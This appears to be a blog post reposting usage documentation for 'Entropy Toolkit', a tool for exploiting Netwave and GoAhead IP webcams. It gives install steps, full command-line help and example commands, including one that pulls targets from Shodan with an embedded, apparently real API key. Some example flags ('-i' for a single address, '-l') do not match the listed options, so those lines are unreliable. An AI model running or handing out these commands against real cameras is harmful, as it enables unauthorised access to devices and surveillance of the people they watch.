Entropy Toolkit tools to exploit IP Webcams

Entropy Toolkit tools to exploit IP Webcams

Entropy Toolkit tools to exploit IP Webcams

About Entropy Toolkit

Entropy Toolkit is a set of tools to exploit Netwave and GoAhead IP Webcams. Entropy is a powerful toolkit for webcams penetration testing.

Entropy installation

  • cd entropy
  • chmod +x install.sh
  • ./install.sh

Entropy uninstallation

  • cd entrop
  • chmod +x uninstall.sh
  • ./uninstall.sh

Entropy Toolkit execution

usage: entropy [-h] [-b [1|2]] [-o <outputfile>] [--timeout <timeout>]
               [-t <tasks>] [-c <count>] [-q | -v]
               [-a <address> | -i <inputfile> | --shodan <API> | --zoomeye <API>]
               [-u]

optional arguments:
  -h, --help            show this help message and exit
  -b [1|2], --brand [1|2]
                        Choose the brand of IP Webcam. (1)Netwave, (2)GoAhead.
  -o <outputfile>, --output <outputfile>
                        Output into path you input.
  --timeout <timeout>   Timeout in seconds.
  -t <tasks>, --task <tasks>
                        Run tasks number of connects in parallel.
  -c <count>, --count <count>
                        The number of IP you want to get from ZoomEye.
  -q, --quiet           Quiet mode.
  -v, --verbose         Verbose mode.
  -a <address>, --address <address>
                        IP:port address of the webcam.
  -i <inputfile>, --input <inputfile>
                        List of IP:port addresses of webcams.
  --shodan <API>        Your Shodan API key.
  --zoomeye <API>       Your ZoomEye API key.
  -u, --update          Update Entropy Toolkit.

Entropy Toolkit examples

Example of exploiting a single webcam

entropy -b 1 -i 192.168.1.100:80 -v 
Example of exploiting webcams from a file

entropy -b 2 -l iplist.txt -v
Example of exploiting webcams using shodan

entropy -b 2 -v --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

Shadow Hacker
بواسطة : Shadow Hacker
Shadow Hacker هي قناة تعليمية حيث أحاول تعليم المبتدئين كل ما هوا مفيد في مجال الهكر والحمايه والمعلوميات ، من خلال شرح البرامج المهمة وبعض من خدمات المواقع ، والتعريف بأفضل طرق الأختراق والحمايه الأنظمة والحسابات ... اذا كان لديك اي استفسار لا تتردد في الأتصال بي
تعليقات



حجم الخط
+
16
-
تباعد السطور
+
2
-